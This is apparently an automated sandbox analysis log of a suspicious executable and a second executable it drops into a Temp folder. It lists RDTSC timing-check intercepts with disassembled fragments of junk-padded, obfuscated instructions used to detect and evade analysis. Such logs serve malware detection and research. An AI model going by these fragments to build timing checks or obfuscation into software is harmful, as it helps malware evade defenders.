Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50705A7 second address: 5070601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FC750FDC940h 0x0000000e jmp 00007FC750FDC8EFh 0x00000013 cmp dword ptr [ebp-14h], edi 0x00000016 pushad 0x00000017 mov ecx, 5A3A9AEBh 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007FC750FDC8ECh 0x00000025 sbb ax, CB78h 0x0000002a jmp 00007FC750FDC8EBh 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 jne 00007FC7C1A0A791h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ebx, 4D293D66h 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070601 second address: 507062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC750B60C37h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507062B second address: 5070677 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c jmp 00007FC750FDC8EEh 0x00000011 xchg eax, esi 0x00000012 jmp 00007FC750FDC8F0h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov di, si 0x0000001e mov ecx, 6F39433Fh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070677 second address: 507067D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507067D second address: 507072B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FC750FDC8F6h 0x00000011 nop 0x00000012 pushad 0x00000013 jmp 00007FC750FDC8EEh 0x00000018 mov ax, 5391h 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007FC750FDC8F7h 0x00000023 nop 0x00000024 jmp 00007FC750FDC8F6h 0x00000029 xchg eax, ebx 0x0000002a jmp 00007FC750FDC8F0h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FC750FDC8ECh 0x00000039 sbb cx, D5A8h 0x0000003e jmp 00007FC750FDC8EBh 0x00000043 popfd 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507072B second address: 5070763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC750B60C35h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FC750B60C36h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070763 second address: 5070768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070020 second address: 5070026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070026 second address: 5070040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, 179C2113h 0x00000012 push esi 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070040 second address: 5070088 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, A4F3h 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FC750B60C2Bh 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC750B60C35h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070088 second address: 507008E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507008E second address: 5070092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070118 second address: 507011E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 507011E second address: 5070122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070122 second address: 5070126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070126 second address: 5070187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC750B60C38h 0x00000012 add ax, A908h 0x00000017 jmp 00007FC750B60C2Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC750B60C38h 0x00000023 or si, 4B68h 0x00000028 jmp 00007FC750B60C2Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070CEE second address: 5070CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070CF4 second address: 5070CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070CF8 second address: 5070D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FC750FDC8F4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FC750FDC8F0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ebx, 6E790400h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070D35 second address: 5070D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, E171h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070E15 second address: 5070E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070E1B second address: 5070E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070E3A second address: 5070E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070E3E second address: 5070E50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070F35 second address: 5070F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5070F39 second address: 5070F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50809B3 second address: 50809B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50809B9 second address: 50809BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50809BD second address: 50809C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50809C1 second address: 50809F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov dl, cl 0x0000000c push edi 0x0000000d mov edx, ecx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 pushad 0x00000015 movsx edi, si 0x00000018 mov eax, 5C576C63h 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC750B60C35h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 50809F8 second address: 5080A19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, 2D88F7EEh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080A19 second address: 5080A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC750B60C31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080A2E second address: 5080AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC750FDC8F7h 0x00000013 and cx, 42AEh 0x00000018 jmp 00007FC750FDC8F9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FC750FDC8F0h 0x00000024 xor ah, 00000028h 0x00000027 jmp 00007FC750FDC8EBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC750FDC8F5h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080AB7 second address: 5080ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080ABD second address: 5080AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080AC1 second address: 5080B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e jmp 00007FC750B60C36h 0x00000013 test esi, esi 0x00000015 pushad 0x00000016 push ecx 0x00000017 jmp 00007FC750B60C2Dh 0x0000001c pop esi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080B08 second address: 5080B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 3360h 0x00000008 popad 0x00000009 popad 0x0000000a je 00007FC7C19EA18Bh 0x00000010 pushad 0x00000011 mov ax, bx 0x00000014 mov eax, edi 0x00000016 popad 0x00000017 cmp dword ptr [75AF459Ch], 05h 0x0000001e pushad 0x0000001f movsx edx, si 0x00000022 pushfd 0x00000023 jmp 00007FC750FDC8F2h 0x00000028 sub esi, 428F28D8h 0x0000002e jmp 00007FC750FDC8EBh 0x00000033 popfd 0x00000034 popad 0x00000035 je 00007FC7C1A0222Dh 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080B5B second address: 5080B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080B5F second address: 5080B91 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC750FDC8F0h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, 02668876h 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dl, 03h 0x00000016 jmp 00007FC750FDC8F0h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080C75 second address: 5080C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 5080C7B second address: 5080C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: FF827A second address: FF82B0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC750B60C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007FC750B60C26h 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 popad 0x00000017 jc 00007FC750B60C4Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC750B60C35h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100A4FB second address: 100A505 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC750FDC8EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100A6AB second address: 100A6C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100A6C2 second address: 100A6C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D471 second address: 100D475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D475 second address: 100D4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 xor dword ptr [esp], 53C9B0FFh 0x0000000e pushad 0x0000000f mov dword ptr [ebp+122D2C22h], ebx 0x00000015 add esi, dword ptr [ebp+122D2C67h] 0x0000001b popad 0x0000001c push 00000003h 0x0000001e mov ecx, dword ptr [ebp+122D2EB7h] 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 or edx, dword ptr [ebp+122D2D4Bh] 0x0000002d pop ecx 0x0000002e push 00000003h 0x00000030 adc edi, 78001D50h 0x00000036 call 00007FC750FDC8E9h 0x0000003b jmp 00007FC750FDC8F0h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 je 00007FC750FDC8F4h 0x00000049 jmp 00007FC750FDC8EEh 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D4DB second address: 100D502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC750B60C26h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC750B60C33h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D502 second address: 100D508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D508 second address: 100D50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D50C second address: 100D510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D510 second address: 100D572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jns 00007FC750B60C2Eh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007FC750B60C2Ch 0x00000019 pop eax 0x0000001a push edx 0x0000001b jmp 00007FC750B60C2Bh 0x00000020 pop ecx 0x00000021 mov cl, ADh 0x00000023 lea ebx, dword ptr [ebp+12451332h] 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D2C1Dh], ebx 0x00000030 xor edi, dword ptr [ebp+122D2DEFh] 0x00000036 popad 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC750B60C32h 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D572 second address: 100D576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D5C6 second address: 100D5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D5CA second address: 100D5D4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC750FDC8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D5D4 second address: 100D5DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D5DA second address: 100D60D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FC750FDC8EAh 0x0000000f nop 0x00000010 or dword ptr [ebp+122D2BACh], edx 0x00000016 sbb esi, 5D31C502h 0x0000001c push 00000000h 0x0000001e movsx edx, cx 0x00000021 call 00007FC750FDC8E9h 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D60D second address: 100D612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D612 second address: 100D64C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC750FDC8F4h 0x00000012 jg 00007FC750FDC8E6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D64C second address: 100D669 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC750B60C2Ch 0x00000008 jnp 00007FC750B60C26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007FC750B60C26h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D669 second address: 100D69C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FC750FDC8F2h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D69C second address: 100D734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FC750B60C28h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 pushad 0x00000025 mov di, F49Dh 0x00000029 sub dword ptr [ebp+122D1D03h], ecx 0x0000002f popad 0x00000030 add dword ptr [ebp+122D1F58h], esi 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D5B0Eh], eax 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007FC750B60C28h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c push edi 0x0000005d mov dword ptr [ebp+122D3161h], ecx 0x00000063 pop ecx 0x00000064 call 00007FC750B60C29h 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FC750B60C35h 0x00000071 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D7EB second address: 100D7F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D7F1 second address: 100D824 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC750B60C34h 0x00000008 jmp 00007FC750B60C2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC750B60C38h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D898 second address: 100D8AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC750FDC8EFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D8AB second address: 100D8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D8AF second address: 100D8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b jmp 00007FC750FDC8F0h 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D31B5h], edx 0x00000019 push 00000000h 0x0000001b or edx, dword ptr [ebp+122D302Bh] 0x00000021 pushad 0x00000022 mov ebx, ecx 0x00000024 mov edi, 5B7957B4h 0x00000029 popad 0x0000002a push FAF53725h 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	RDTSC instruction interceptor: First address: 100D8EE second address: 100D8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
